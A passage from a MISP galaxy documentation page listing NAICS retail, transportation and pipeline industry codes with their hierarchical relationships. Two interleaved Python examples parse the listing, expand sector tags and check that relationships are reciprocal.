
459920 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45992" with estimative-language:likelihood-probability="likely"

45993

Manufactured (Mobile) Home Dealers

The tag is: misp-galaxy:naics="45993"

45993 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459930" with estimative-language:likelihood-probability="likely"

459930

Manufactured (Mobile) Home Dealers

The tag is: misp-galaxy:naics="459930"

459930 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45993" with estimative-language:likelihood-probability="likely"

45999

All Other Miscellaneous Retailers

The tag is: misp-galaxy:naics="45999"

45999 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

459991

Tobacco, Electronic Cigarette, and Other Smoking Supplies Retailers

The tag is: misp-galaxy:naics="459991"

459991 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

459999

All Other Miscellaneous Retailers

The tag is: misp-galaxy:naics="459999"

459999 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"
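The retail sector listing above shows the shape of every NAICS entry in this galaxy: a code line, a name line, a "The tag is:" line, and bullets that carry parent-of, child-of and similar relationships, each with an estimative-language likelihood. One detail matters when these tags are used to filter events by sector: the 6-digit codes are attached directly to the 4-digit industry group (449110 is child-of 4491, not of 44911), and the 5-digit and 6-digit levels are linked only by "similar". A naive walk down child-of edges from a 5-digit code therefore returns nothing. The Python below is an added example, not code from the MISP project or from this documentation: it parses the page's plain-text rendering, expands a sector code to the full set of tags beneath it (following "similar" where wanted), and flags any relationship whose reverse edge is missing. EXCERPT is a constructed copy of the 4491, 44911 and 449110 entries above with the blank lines between them dropped.

```python
"""Parse and walk the NAICS galaxy relationships as rendered on this page.
Added example; not code from the MISP project or from this documentation.
EXCERPT is a constructed copy of three entries above, blank lines omitted."""
import re
from collections import deque
from dataclasses import dataclass, field

TAG_RE = re.compile(r'^The tag is: misp-galaxy:naics="([^"]+)"$')
REL_RE = re.compile(
    r'^[•*-]?\s*(child-of|parent-of|similar):\s*misp-galaxy:naics="([^"]+)"'
    r'\s+with\s+estimative-language:likelihood-probability="([^"]+)"$'
)

EXCERPT = """\
4491
Furniture and Home Furnishings Retailers
The tag is: misp-galaxy:naics="4491"
4491 has relationships with:
  • child-of: misp-galaxy:naics="449" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="44911" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="449110" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="44912" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="449121" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="449122" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="449129" with estimative-language:likelihood-probability="likely"
44911
Furniture Retailers
The tag is: misp-galaxy:naics="44911"
44911 has relationships with:
  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="449110" with estimative-language:likelihood-probability="likely"
449110
Furniture Retailers
The tag is: misp-galaxy:naics="449110"
449110 has relationships with:
  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="44911" with estimative-language:likelihood-probability="likely"
"""

@dataclass
class Cluster:
    code: str
    name: str
    parents: set = field(default_factory=set)
    children: set = field(default_factory=set)
    similar: set = field(default_factory=set)

def parse_listing(text):
    """Rebuild {code: Cluster} from the page layout: code, name, tag line, bullets."""
    clusters = {}
    recent = []        # non-empty lines seen since the last tag line
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := TAG_RE.match(line):
            # The name is the line just before the tag line; the code precedes the name.
            name = recent[-1] if recent else ""
            current = clusters.setdefault(m.group(1), Cluster(m.group(1), name))
            recent.clear()
        elif (m := REL_RE.match(line)) and current is not None:
            kind, target, _likelihood = m.groups()
            {"child-of": current.parents, "parent-of": current.children,
             "similar": current.similar}[kind].add(target)
        else:
            recent.append(line)
    return clusters

def descendants(clusters, code):
    """Transitive closure over parent-of edges; targets not defined in the input stay as leaves."""
    seen, queue = set(), deque([code])
    while queue:
        for child in clusters.get(queue.popleft(), Cluster("", "")).children - seen:
            seen.add(child)
            queue.append(child)
    return seen

def expand_tags(clusters, code, include_similar=True):
    """Tags to OR together when filtering events by a sector and everything beneath it."""
    codes = {code} | descendants(clusters, code)
    if include_similar:   # 5-digit and 6-digit codes are joined by 'similar', not child-of
        for c in list(codes):
            codes |= clusters.get(c, Cluster("", "")).similar
    return sorted(f'misp-galaxy:naics="{c}"' for c in codes)

def check_symmetry(clusters):
    """Flag edges whose reverse edge is missing; codes absent from the input are skipped."""
    issues = []
    for c in clusters.values():
        for p in c.parents:
            if p in clusters and c.code not in clusters[p].children:
                issues.append(f"{c.code} child-of {p}, but {p} lacks parent-of {c.code}")
        for ch in c.children:
            if ch in clusters and c.code not in clusters[ch].parents:
                issues.append(f"{c.code} parent-of {ch}, but {ch} lacks child-of {c.code}")
        for s in c.similar:
            if s in clusters and c.code not in clusters[s].similar:
                issues.append(f"{c.code} similar {s}, but {s} lacks similar {c.code}")
    return issues
```

With this excerpt, `descendants(clusters, "44911")` is empty while `expand_tags(clusters, "44911")` yields both the 5-digit and the 6-digit tag, which is the behaviour to keep in mind when building sector filters from these tags. The same parser applies unchanged to the full rendered listing, since every entry on the page follows the same layout.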

48-49

Transportation and Warehousing

The tag is: misp-galaxy:naics="48-49"

481

Air Transportation

The tag is: misp-galaxy:naics="481"

481 has relationships with:

  • parent-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

4811

Scheduled Air Transportation

The tag is: misp-galaxy:naics="4811"

4811 has relationships with:

  • child-of: misp-galaxy:naics="481" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481112" with estimative-language:likelihood-probability="likely"

48111

Scheduled Air Transportation

The tag is: misp-galaxy:naics="48111"

48111 has relationships with:

  • child-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

481111

Scheduled Passenger Air Transportation

The tag is: misp-galaxy:naics="481111"

481111 has relationships with:

  • child-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

481112

Scheduled Freight Air Transportation

The tag is: misp-galaxy:naics="481112"

481112 has relationships with:

  • child-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

4812

Nonscheduled Air Transportation

The tag is: misp-galaxy:naics="4812"

4812 has relationships with:

  • child-of: misp-galaxy:naics="481" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481219" with estimative-language:likelihood-probability="likely"

48121

Nonscheduled Air Transportation

The tag is: misp-galaxy:naics="48121"

48121 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

481211

Nonscheduled Chartered Passenger Air Transportation

The tag is: misp-galaxy:naics="481211"

481211 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

481212

Nonscheduled Chartered Freight Air Transportation

The tag is: misp-galaxy:naics="481212"

481212 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

481219

Other Nonscheduled Air Transportation

The tag is: misp-galaxy:naics="481219"

481219 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

482

Rail Transportation

The tag is: misp-galaxy:naics="482"

482 has relationships with:

  • parent-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

4821

Rail Transportation

The tag is: misp-galaxy:naics="4821"

4821 has relationships with:

  • child-of: misp-galaxy:naics="482" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="482111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="482112" with estimative-language:likelihood-probability="likely"

48211

Rail Transportation

The tag is: misp-galaxy:naics="48211"

48211 has relationships with:

  • child-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

482111

Line-Haul Railroads

The tag is: misp-galaxy:naics="482111"

482111 has relationships with:

  • child-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

482112

Short Line Railroads

The tag is: misp-galaxy:naics="482112"

482112 has relationships with:

  • child-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

483

Water Transportation

The tag is: misp-galaxy:naics="483"

483 has relationships with:

  • parent-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

4831

Deep Sea, Coastal, and Great Lakes Water Transportation

The tag is: misp-galaxy:naics="4831"

4831 has relationships with:

  • child-of: misp-galaxy:naics="483" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483114" with estimative-language:likelihood-probability="likely"

48311

Deep Sea, Coastal, and Great Lakes Water Transportation

The tag is: misp-galaxy:naics="48311"

48311 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483111

Deep Sea Freight Transportation

The tag is: misp-galaxy:naics="483111"

483111 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483112

Deep Sea Passenger Transportation

The tag is: misp-galaxy:naics="483112"

483112 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483113

Coastal and Great Lakes Freight Transportation

The tag is: misp-galaxy:naics="483113"

483113 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483114

Coastal and Great Lakes Passenger Transportation

The tag is: misp-galaxy:naics="483114"

483114 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

4832

Inland Water Transportation

The tag is: misp-galaxy:naics="4832"

4832 has relationships with:

  • child-of: misp-galaxy:naics="483" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483212" with estimative-language:likelihood-probability="likely"

48321

Inland Water Transportation

The tag is: misp-galaxy:naics="48321"

48321 has relationships with:

  • child-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

483211

Inland Water Freight Transportation

The tag is: misp-galaxy:naics="483211"

483211 has relationships with:

  • child-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

483212

Inland Water Passenger Transportation

The tag is: misp-galaxy:naics="483212"

483212 has relationships with:

  • child-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

484

Truck Transportation

The tag is: misp-galaxy:naics="484"

484 has relationships with:

  • parent-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

4841

General Freight Trucking

The tag is: misp-galaxy:naics="4841"

4841 has relationships with:

  • child-of: misp-galaxy:naics="484" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484122" with estimative-language:likelihood-probability="likely"

48411

General Freight Trucking, Local

The tag is: misp-galaxy:naics="48411"

48411 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484110" with estimative-language:likelihood-probability="likely"

484110

General Freight Trucking, Local

The tag is: misp-galaxy:naics="484110"

484110 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48411" with estimative-language:likelihood-probability="likely"

48412

General Freight Trucking, Long-Distance

The tag is: misp-galaxy:naics="48412"

48412 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

484121

General Freight Trucking, Long-Distance, Truckload

The tag is: misp-galaxy:naics="484121"

484121 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

484122

General Freight Trucking, Long-Distance, Less Than Truckload

The tag is: misp-galaxy:naics="484122"

484122 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"
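
The relationship bullets in this listing follow one fixed pattern: a parent-of edge on the higher-level code, the reciprocal child-of on the lower one, and, for the 5-digit and 6-digit codes that carry the same name (48411 and 484110, for example), a symmetric similar edge. Anyone ingesting this galaxy into their own tooling will want to confirm the graph is consistent before relying on it. The following is an added example, not code from the MISP project or from this generated document: it parses the listing in the rendered text form shown on this page and reports any edge whose reciprocal is missing, plus any same-named 5/6-digit pair that lacks its similar link. The sample text is a constructed fixture trimmed to the 4841 branch of the 484 Truck Transportation entries above (the 4842 edge is dropped so the fixture is self-contained); the function and pattern names are the example's own.

```python
"""Consistency checks for the rendered NAICS galaxy listing (added example)."""
import re
from collections import defaultdict

# Constructed fixture: the 484 / 4841 entries copied from the rendered
# listing, trimmed so every referenced code is present in the sample.
SAMPLE_LISTING = """
484

Truck Transportation

The tag is: misp-galaxy:naics="484"

484 has relationships with:

  • parent-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

4841

General Freight Trucking

The tag is: misp-galaxy:naics="4841"

4841 has relationships with:

  • child-of: misp-galaxy:naics="484" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484110" with estimative-language:likelihood-probability="likely"

48411

General Freight Trucking, Local

The tag is: misp-galaxy:naics="48411"

48411 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484110" with estimative-language:likelihood-probability="likely"

484110

General Freight Trucking, Local

The tag is: misp-galaxy:naics="484110"

484110 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48411" with estimative-language:likelihood-probability="likely"
"""

# "The tag is:" opens a cluster; the line before it (non-blank) is its name.
TAG_RE = re.compile(r'^The tag is: misp-galaxy:naics="(\d+)"$')
# One relationship bullet as rendered on the page.
REL_RE = re.compile(
    r'^\s*•\s*(parent-of|child-of|similar):\s*misp-galaxy:naics="(\d+)"'
    r'\s+with\s+estimative-language:likelihood-probability="([^"]+)"'
)
# Each edge type must be mirrored by this type on the destination cluster.
RECIPROCAL = {"parent-of": "child-of", "child-of": "parent-of", "similar": "similar"}


def parse_listing(text):
    """Return {code: {"name": str, "rels": [(type, dest_code, likelihood), ...]}}."""
    clusters, current, last_nonblank = {}, None, ""
    for line in text.splitlines():
        tag = TAG_RE.match(line.strip())
        if tag:
            current = tag.group(1)
            clusters[current] = {"name": last_nonblank, "rels": []}
        else:
            rel = REL_RE.match(line)
            if rel and current is not None:
                clusters[current]["rels"].append(rel.groups())
        if line.strip():
            last_nonblank = line.strip()
    return clusters


def check_reciprocity(clusters):
    """Every A -t-> B needs B -RECIPROCAL[t]-> A; returns findings (empty = consistent)."""
    edges = {(src, t, dst) for src, c in clusters.items() for t, dst, _ in c["rels"]}
    findings = []
    for src, t, dst in sorted(edges):
        if dst not in clusters:
            findings.append(f"{src} {t} {dst}: {dst} is not in the listing")
        elif (dst, RECIPROCAL[t], src) not in edges:
            findings.append(f"{src} {t} {dst}: no matching {RECIPROCAL[t]} on {dst}")
    return findings


def unlinked_same_name_pairs(clusters):
    """Same-named 5-digit/6-digit pairs (48411, 484110) should be linked by 'similar'
    in both directions; returns (a, b) pairs where a lacks the link to b."""
    by_name = defaultdict(list)
    for code, c in clusters.items():
        by_name[c["name"]].append(code)
    missing = []
    for codes in by_name.values():
        for a in codes:
            linked = {d for t, d, _ in clusters[a]["rels"] if t == "similar"}
            for b in codes:
                if a != b and {len(a), len(b)} == {5, 6} and b not in linked:
                    missing.append((a, b))
    return sorted(missing)


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    print(check_reciprocity(parsed) or "all edges reciprocated")
    print(unlinked_same_name_pairs(parsed) or "all same-name pairs linked")
```

Run against the full rendered listing, an empty result from both functions means the galaxy's edges can be loaded as an undirected tree plus symmetric similar links without special-casing; any finding points at the exact cluster and edge type to inspect before the data is used for tagging or pivoting.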

4842

Specialized Freight Trucking

The tag is: misp-galaxy:naics="4842"

4842 has relationships with:

  • child-of: misp-galaxy:naics="484" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484230" with estimative-language:likelihood-probability="likely"

48421

Used Household and Office Goods Moving

The tag is: misp-galaxy:naics="48421"

48421 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484210" with estimative-language:likelihood-probability="likely"

484210

Used Household and Office Goods Moving

The tag is: misp-galaxy:naics="484210"

484210 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48421" with estimative-language:likelihood-probability="likely"

48422

Specialized Freight (except Used Goods) Trucking, Local

The tag is: misp-galaxy:naics="48422"

48422 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484220" with estimative-language:likelihood-probability="likely"

484220

Specialized Freight (except Used Goods) Trucking, Local

The tag is: misp-galaxy:naics="484220"

484220 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48422" with estimative-language:likelihood-probability="likely"

48423

Specialized Freight (except Used Goods) Trucking, Long-Distance

The tag is: misp-galaxy:naics="48423"

48423 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484230" with estimative-language:likelihood-probability="likely"

484230

Specialized Freight (except Used Goods) Trucking, Long-Distance

The tag is: misp-galaxy:naics="484230"

484230 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48423" with estimative-language:likelihood-probability="likely"

485

Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="485"

485 has relationships with:

  • parent-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4852" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4854" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4855" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

4851

Urban Transit Systems

The tag is: misp-galaxy:naics="4851"

4851 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485119" with estimative-language:likelihood-probability="likely"

48511

Urban Transit Systems

The tag is: misp-galaxy:naics="48511"

48511 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485111

Mixed Mode Transit Systems

The tag is: misp-galaxy:naics="485111"

485111 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485112

Commuter Rail Systems

The tag is: misp-galaxy:naics="485112"

485112 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485113

Bus and Other Motor Vehicle Transit Systems

The tag is: misp-galaxy:naics="485113"

485113 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485119

Other Urban Transit Systems

The tag is: misp-galaxy:naics="485119"

485119 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

4852

Interurban and Rural Bus Transportation

The tag is: misp-galaxy:naics="4852"

4852 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485210" with estimative-language:likelihood-probability="likely"

48521

Interurban and Rural Bus Transportation

The tag is: misp-galaxy:naics="48521"

48521 has relationships with:

  • child-of: misp-galaxy:naics="4852" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485210" with estimative-language:likelihood-probability="likely"

485210

Interurban and Rural Bus Transportation

The tag is: misp-galaxy:naics="485210"

485210 has relationships with:

  • child-of: misp-galaxy:naics="4852" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48521" with estimative-language:likelihood-probability="likely"

4853

Taxi and Limousine Service

The tag is: misp-galaxy:naics="4853"

4853 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485320" with estimative-language:likelihood-probability="likely"

48531

Taxi and Ridesharing Services

The tag is: misp-galaxy:naics="48531"

48531 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485310" with estimative-language:likelihood-probability="likely"

485310

Taxi and Ridesharing Services

The tag is: misp-galaxy:naics="485310"

485310 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48531" with estimative-language:likelihood-probability="likely"

48532

Limousine Service

The tag is: misp-galaxy:naics="48532"

48532 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485320" with estimative-language:likelihood-probability="likely"

485320

Limousine Service

The tag is: misp-galaxy:naics="485320"

485320 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48532" with estimative-language:likelihood-probability="likely"

4854

School and Employee Bus Transportation

The tag is: misp-galaxy:naics="4854"

4854 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485410" with estimative-language:likelihood-probability="likely"

48541

School and Employee Bus Transportation

The tag is: misp-galaxy:naics="48541"

48541 has relationships with:

  • child-of: misp-galaxy:naics="4854" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485410" with estimative-language:likelihood-probability="likely"

485410

School and Employee Bus Transportation

The tag is: misp-galaxy:naics="485410"

485410 has relationships with:

  • child-of: misp-galaxy:naics="4854" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48541" with estimative-language:likelihood-probability="likely"

4855

Charter Bus Industry

The tag is: misp-galaxy:naics="4855"

4855 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485510" with estimative-language:likelihood-probability="likely"

48551

Charter Bus Industry

The tag is: misp-galaxy:naics="48551"

48551 has relationships with:

  • child-of: misp-galaxy:naics="4855" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485510" with estimative-language:likelihood-probability="likely"

485510

Charter Bus Industry

The tag is: misp-galaxy:naics="485510"

485510 has relationships with:

  • child-of: misp-galaxy:naics="4855" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48551" with estimative-language:likelihood-probability="likely"

4859

Other Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="4859"

4859 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485999" with estimative-language:likelihood-probability="likely"

48599

Other Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="48599"

48599 has relationships with:

  • child-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

485991

Special Needs Transportation

The tag is: misp-galaxy:naics="485991"

485991 has relationships with:

  • child-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

485999

All Other Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="485999"

485999 has relationships with:

  • child-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

486

Pipeline Transportation

The tag is: misp-galaxy:naics="486"

486 has relationships with:

  • parent-of: misp-galaxy:naics="4861" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4862" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

4861

Pipeline Transportation of Crude Oil

The tag is: misp-galaxy:naics="4861"

4861 has relationships with:

  • child-of: misp-galaxy:naics="486" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486110" with estimative-language:likelihood-probability="likely"

48611

Pipeline Transportation of Crude Oil

The tag is: misp-galaxy:naics="48611"

48611 has relationships with:

  • child-of: misp-galaxy:naics="4861" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486110" with estimative-language:likelihood-probability="likely"

486110

Pipeline Transportation of Crude Oil

The tag is: misp-galaxy:naics="486110"

486110 has relationships with:

  • child-of: misp-galaxy:naics="4861" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48611" with estimative-language:likelihood-probability="likely"

4862

Pipeline Transportation of Natural Gas

The tag is: misp-galaxy:naics="4862"

4862 has relationships with:

  • child-of: misp-galaxy:naics="486" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486210" with estimative-language:likelihood-probability="likely"

48621

Pipeline Transportation of Natural Gas

The tag is: misp-galaxy:naics="48621"

48621 has relationships with:

  • child-of: misp-galaxy:naics="4862" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486210" with estimative-language:likelihood-probability="likely"

486210

Pipeline Transportation of Natural Gas

The tag is: misp-galaxy:naics="486210"

486210 has relationships with:

  • child-of: misp-galaxy:naics="4862" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48621" with estimative-language:likelihood-probability="likely"

4869

Other Pipeline Transportation

The tag is: misp-galaxy:naics="4869"

4869 has relationships with:

  • child-of: misp-galaxy:naics="486" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48691" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48699" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486990" with estimative-language:likelihood-probability="likely"

48691

Pipeline Transportation of Refined Petroleum Products

The tag is: misp-galaxy:naics="48691"

48691 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486910" with estimative-language:likelihood-probability="likely"

486910

Pipeline Transportation of Refined Petroleum Products

The tag is: misp-galaxy:naics="486910"

486910 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48691" with estimative-language:likelihood-probability="likely"

48699

All Other Pipeline Transportation

The tag is: misp-galaxy:naics="48699"

48699 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

